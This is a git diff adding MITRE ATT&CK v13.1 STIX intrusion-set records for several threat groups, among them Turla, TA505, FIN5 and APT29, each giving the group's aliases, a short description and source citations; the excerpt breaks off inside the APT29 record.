b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6.json new file mode 100644 index 0000000000000000000000000000000000000000..5e1fa6b5ed46fa1a54432f6c56b0115c4c9ce474 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6.json @@ -0,0 +1,140 @@ +{ + "type": "bundle", + "id": "bundle--9528ba74-8341-4f26-9db7-8b14cdafa5b1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:41:28.428Z", + "name": "Turla", + "description": "[Turla](https://attack.mitre.org/groups/G0010) is a Russian-based threat group that has infected victims in over 45 countries, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies since 2004. Heightened activity was seen in mid-2015. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware. [Turla](https://attack.mitre.org/groups/G0010)\u2019s espionage platform is mainly used against Windows machines, but has also been seen used against macOS and Linux machines.(Citation: Kaspersky Turla)(Citation: ESET Gazer Aug 2017)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla Mosquito Jan 2018)", + "aliases": [ + "Turla", + "IRON HUNTER", + "Group 88", + "Belugasturgeon", + "Waterbug", + "WhiteBear", + "Snake", + "Krypton", + "Venomous Bear" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Matthieu Faou, ESET", + "Edward Millington" + ], + "type": "intrusion-set", + "id": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6", + "created": "2017-05-31T21:31:49.816Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0010", + "external_id": "G0010" + }, + { + "source_name": "Belugasturgeon", + "description": "(Citation: Accenture HyperStack October 2020)" + }, + { + "source_name": "Krypton", + "description": "(Citation: CrowdStrike VENOMOUS BEAR)" + }, + { + "source_name": "Snake", + "description": "(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla PowerShell May 2019)(Citation: Talos TinyTurla September 2021)" + }, + { + "source_name": "Venomous Bear", + "description": "(Citation: CrowdStrike VENOMOUS BEAR)(Citation: Talos TinyTurla September 2021)" + }, + { + "source_name": "Turla", + "description": "(Citation: Kaspersky Turla)" + }, + { + "source_name": "Group 88", + "description": "(Citation: Leonardo Turla Penquin May 2020)" + }, + { + "source_name": "IRON HUNTER", + "description": "(Citation: Secureworks IRON HUNTER Profile)" + }, + { + "source_name": "Accenture HyperStack October 2020", + "description": "Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.", + "url": "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity" + }, + { + "source_name": "Waterbug", + "description": "Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.(Citation: Symantec Waterbug)" + }, + { + "source_name": "Talos TinyTurla September 2021", + "description": "Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021.", + "url": "https://blog.talosintelligence.com/2021/09/tinyturla.html" + }, + { + "source_name": "ESET Turla Mosquito Jan 2018", + "description": "ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" + }, + { + "source_name": "ESET Gazer Aug 2017", + "description": "ESET. (2017, August). Gazing at Gazer: Turla\u2019s new second stage backdoor. Retrieved September 14, 2017.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf" + }, + { + "source_name": "ESET Turla PowerShell May 2019", + "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.", + "url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" + }, + { + "source_name": "Securelist WhiteBear Aug 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.", + "url": "https://securelist.com/introducing-whitebear/81638/" + }, + { + "source_name": "Kaspersky Turla", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.", + "url": "https://securelist.com/the-epic-turla-operation/65545/" + }, + { + "source_name": "Leonardo Turla Penquin May 2020", + "description": "Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA \u201cPenquin_x64\u201d. Retrieved March 11, 2021.", + "url": "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf" + }, + { + "source_name": "CrowdStrike VENOMOUS BEAR", + "description": "Meyers, A. (2018, March 12). Meet CrowdStrike\u2019s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/" + }, + { + "source_name": "Secureworks IRON HUNTER Profile", + "description": "Secureworks CTU. (n.d.). IRON HUNTER. Retrieved February 22, 2022.", + "url": "http://www.secureworks.com/research/threat-profiles/iron-hunter" + }, + { + "source_name": "Symantec Waterbug", + "description": "Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.", + "url": "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1" + }, + { + "source_name": "WhiteBear", + "description": "WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.(Citation: Securelist WhiteBear Aug 2017)(Citation: Talos TinyTurla September 2021)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7ecc3b4f-5cdb-457e-b55a-df376b359446.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7ecc3b4f-5cdb-457e-b55a-df376b359446.json new file mode 100644 index 0000000000000000000000000000000000000000..2021760c0b3ccf2e20efa61848d657f2a902d8ec --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7ecc3b4f-5cdb-457e-b55a-df376b359446.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--e040195a-8a2b-483b-bd31-794e915ed8fa", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Poseidon Group" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--7ecc3b4f-5cdb-457e-b55a-df376b359446", + "type": "intrusion-set", + "created": "2017-05-31T21:32:04.179Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0033", + "external_id": "G0033" + }, + { + "source_name": "Poseidon Group", + "description": "(Citation: Kaspersky Poseidon Group)" + }, + { + "url": "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2016, February 9). Poseidon Group: a Targeted Attack Boutique specializing in global cyber-espionage. Retrieved March 16, 2016.", + "source_name": "Kaspersky Poseidon Group" + } + ], + "modified": "2020-03-18T20:25:54.945Z", + "name": "Poseidon Group", + "description": "[Poseidon Group](https://attack.mitre.org/groups/G0033) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://attack.mitre.org/groups/G0033) as a security firm. (Citation: Kaspersky Poseidon Group)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d.json new file mode 100644 index 0000000000000000000000000000000000000000..754b0dfc966793119e92d6ea6d064d7e53eba983 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--5cca235d-0516-4380-9c07-3b35b1a67598", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:38:20.381Z", + "name": "TA505", + "description": "[TA505](https://attack.mitre.org/groups/G0092) is a cyber criminal group that has been active since at least 2014. [TA505](https://attack.mitre.org/groups/G0092) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://attack.mitre.org/software/S0611).(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020)", + "aliases": [ + "TA505", + "Hive0065" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "type": "intrusion-set", + "id": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d", + "created": "2019-05-28T15:54:17.213Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0092", + "external_id": "G0092" + }, + { + "source_name": "Hive0065", + "description": "(Citation: IBM TA505 April 2020)" + }, + { + "source_name": "Korean FSI TA505 2020", + "description": "Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.", + "url": "https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=" + }, + { + "source_name": "IBM TA505 April 2020", + "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.", + "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/" + }, + { + "source_name": "Proofpoint TA505 Sep 2017", + "description": "Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.", + "url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter" + }, + { + "source_name": "Proofpoint TA505 June 2018", + "description": "Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.", + "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times" + }, + { + "source_name": "Proofpoint TA505 Jan 2019", + "description": "Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.", + "url": "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505" + }, + { + "source_name": "NCC Group TA505", + "description": "Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.", + "url": "https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7f848c02-4d1e-4808-a4ae-4670681370a9.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7f848c02-4d1e-4808-a4ae-4670681370a9.json new file mode 100644 index 0000000000000000000000000000000000000000..779757c391cba3505be39a7bff6d5315aa8c1c73 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--7f848c02-4d1e-4808-a4ae-4670681370a9.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--4eef452a-fd53-4890-8f8f-1962a7ab7d9a", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "BITTER", + "T-APT-17" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--7f848c02-4d1e-4808-a4ae-4670681370a9", + "created": "2022-06-01T20:26:53.880Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G1002", + "url": "https://attack.mitre.org/groups/G1002" + }, + { + "source_name": "T-APT-17", + "description": "(Citation: Cisco Talos Bitter Bangladesh May 2022)" + }, + { + "source_name": "Forcepoint BITTER Pakistan Oct 2016", + "url": "https://www.forcepoint.com/blog/x-labs/bitter-targeted-attack-against-pakistan", + "description": "Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022." + }, + { + "source_name": "Cisco Talos Bitter Bangladesh May 2022", + "url": "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html", + "description": "Raghuprasad, C . (2022, May 11). Bitter APT adds Bangladesh to their targets. Retrieved June 1, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)", + "modified": "2022-06-01T21:20:18.113Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "BITTER", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--813636db-3939-4a45-bea9-6113e970c029.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--813636db-3939-4a45-bea9-6113e970c029.json new file mode 100644 index 0000000000000000000000000000000000000000..2a35d752100198e3afccaa9795cc7961f4ef1c80 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--813636db-3939-4a45-bea9-6113e970c029.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--189ddd1c-7cba-4a20-be7b-88b02fff7690", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "DarkVishnya" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--813636db-3939-4a45-bea9-6113e970c029", + "type": "intrusion-set", + "created": "2020-05-15T13:07:26.651Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0105", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0105" + }, + { + "source_name": "DarkVishnya", + "description": "(Citation: Securelist DarkVishnya Dec 2018)" + }, + { + "source_name": "Securelist DarkVishnya Dec 2018", + "url": "https://securelist.com/darkvishnya/89169/", + "description": "Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020." + } + ], + "modified": "2021-10-12T22:10:04.107Z", + "name": "DarkVishnya", + "description": "[DarkVishnya](https://attack.mitre.org/groups/G0105) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.(Citation: Securelist DarkVishnya Dec 2018)", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--85403903-15e0-4f9f-9be4-a259ecad4022.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--85403903-15e0-4f9f-9be4-a259ecad4022.json new file mode 100644 index 0000000000000000000000000000000000000000..28ed81ba5d51b38d21f0f9a9ebb16fcd603058ce --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--85403903-15e0-4f9f-9be4-a259ecad4022.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--5e165d6d-265d-4f03-856a-e38fd6ca8330", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "FIN5" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Walker Johnson" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--85403903-15e0-4f9f-9be4-a259ecad4022", + "type": "intrusion-set", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0053", + "external_id": "G0053" + }, + { + "source_name": "FIN5", + "description": "(Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)" + }, + { + "source_name": "FireEye Respond Webinar July 2017", + "description": "Scavella, T. and Rifki, A. (2017, July 20). Are you Ready to Respond? (Webinar). Retrieved October 4, 2017.", + "url": "https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html" + }, + { + "source_name": "Mandiant FIN5 GrrCON Oct 2016", + "description": "Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.", + "url": "https://www.youtube.com/watch?v=fevGZs0EQu8" + }, + { + "source_name": "DarkReading FireEye FIN5 Oct 2015", + "description": "Higgins, K. (2015, October 13). Prolific Cybercrime Gang Favors Legit Login Credentials. Retrieved October 4, 2017.", + "url": "https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?" + } + ], + "modified": "2021-10-16T19:48:37.809Z", + "name": "FIN5", + "description": "[FIN5](https://attack.mitre.org/groups/G0053) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. (Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)", + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--88489675-d216-4884-a98f-49a89fcc1643.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--88489675-d216-4884-a98f-49a89fcc1643.json new file mode 100644 index 0000000000000000000000000000000000000000..6bbdacdd079b893472b664e5de9215a117cd2e5b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--88489675-d216-4884-a98f-49a89fcc1643.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--e95bba67-93b0-4ff6-a6c8-1c9370605a93", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Mofang" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643", + "type": "intrusion-set", + "created": "2020-05-12T21:23:59.021Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0103", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0103" + }, + { + "source_name": "FOX-IT May 2016 Mofang", + "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf", + "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020." + } + ], + "modified": "2020-05-29T03:30:39.739Z", + "name": "Mofang", + "description": "[Mofang](https://attack.mitre.org/groups/G0103) is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim's infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.(Citation: FOX-IT May 2016 Mofang)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--88b7dbc2-32d3-4e31-af2f-3fc24e1582d7.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--88b7dbc2-32d3-4e31-af2f-3fc24e1582d7.json new file mode 100644 index 0000000000000000000000000000000000000000..ffe884f1a5d63a97eb82071e212a0180a0732d6b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--88b7dbc2-32d3-4e31-af2f-3fc24e1582d7.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--ae40c50c-f126-48dd-92d4-ba46708854a1", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Lotus Blossom", + "DRAGONFISH", + "Spring Dragon" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--88b7dbc2-32d3-4e31-af2f-3fc24e1582d7", + "type": "intrusion-set", + "created": "2017-05-31T21:32:01.092Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0030", + "external_id": "G0030" + }, + { + "source_name": "Lotus Blossom", + "description": "(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)" + }, + { + "source_name": "DRAGONFISH", + "description": "(Citation: Accenture Dragonfish Jan 2018)" + }, + { + "source_name": "Spring Dragon", + "description": "(Citation: Spring Dragon Jun 2015)(Citation: Accenture Dragonfish Jan 2018)" + }, + { + "url": "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html", + "description": "Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.", + "source_name": "Lotus Blossom Jun 2015" + }, + { + "source_name": "Accenture Dragonfish Jan 2018", + "url": "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", + "description": "Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS\u2019 MEETING AND ASSOCIATES. Retrieved November 14, 2018." + }, + { + "url": "https://securelist.com/the-spring-dragon-apt/70726/", + "description": "Baumgartner, K.. (2015, June 17). The Spring Dragon APT. Retrieved February 15, 2016.", + "source_name": "Spring Dragon Jun 2015" + } + ], + "modified": "2019-03-25T14:17:43.218Z", + "name": "Lotus Blossom", + "description": "[Lotus Blossom](https://attack.mitre.org/groups/G0030) is a threat group that has targeted government and military organizations in Southeast Asia. (Citation: Lotus Blossom Jun 2015)", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--894aab42-3371-47b1-8859-a4a074c804c8.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--894aab42-3371-47b1-8859-a4a074c804c8.json new file mode 100644 index 0000000000000000000000000000000000000000..d6ac0437577b5c5be77e753fc11e3c91bd7f0542 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--894aab42-3371-47b1-8859-a4a074c804c8.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--b2acece6-08ac-4b43-998a-d81438be03e0", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Stealth Falcon" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--894aab42-3371-47b1-8859-a4a074c804c8", + "type": "intrusion-set", + "created": "2017-05-31T21:32:06.390Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0038", + "external_id": "G0038" + }, + { + "source_name": "Stealth Falcon", + "description": "(Citation: Citizen Lab Stealth Falcon May 2016)" + }, + { + "source_name": "Citizen Lab Stealth Falcon May 2016", + "description": "Marczak, B. and Scott-Railton, J.. (2016, May 29). Keep Calm and (Don\u2019t) Enable Macros: A New Threat Actor Targets UAE Dissidents. Retrieved June 8, 2016.", + "url": "https://citizenlab.org/2016/05/stealth-falcon/" + } + ], + "modified": "2020-11-23T18:57:19.208Z", + "name": "Stealth Falcon", + "description": "[Stealth Falcon](https://attack.mitre.org/groups/G0038) is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. (Citation: Citizen Lab Stealth Falcon May 2016)", + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542.json new file mode 100644 index 0000000000000000000000000000000000000000..f4c725ea5b427dbaa5ab7fa80d647e32f3c8e6ac --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542.json @@ -0,0 +1,247 @@ +{ + "type": "bundle", + "id": "bundle--329bd89f-9890-49ce-875a-e787aee531da", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-16T22:25:01.191Z", + "name": "APT29", + "description": "[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)\n\nIn April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Unit 42 SolarStorm December 2020)", + "aliases": [ + "APT29", + "IRON RITUAL", + "IRON HEMLOCK", + "NobleBaron", + "Dark Halo", + "StellarParticle", + "NOBELIUM", + "UNC2452", + "YTTRIUM", + "The Dukes", + "Cozy Bear", + "CozyDuke", + "SolarStorm", + "Blue Kitsune" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "4.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security", + "Matt Brenton, Zurich Insurance Group", + "Katie Nickels, Red Canary", + "Joe Gumke, U.S. Bank" + ], + "type": "intrusion-set", + "id": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "created": "2017-05-31T21:31:52.748Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0016", + "external_id": "G0016" + }, + { + "source_name": "CozyDuke", + "description": "(Citation: Crowdstrike DNC June 2016)" + }, + { + "source_name": "Cozy Bear", + "description": "(Citation: 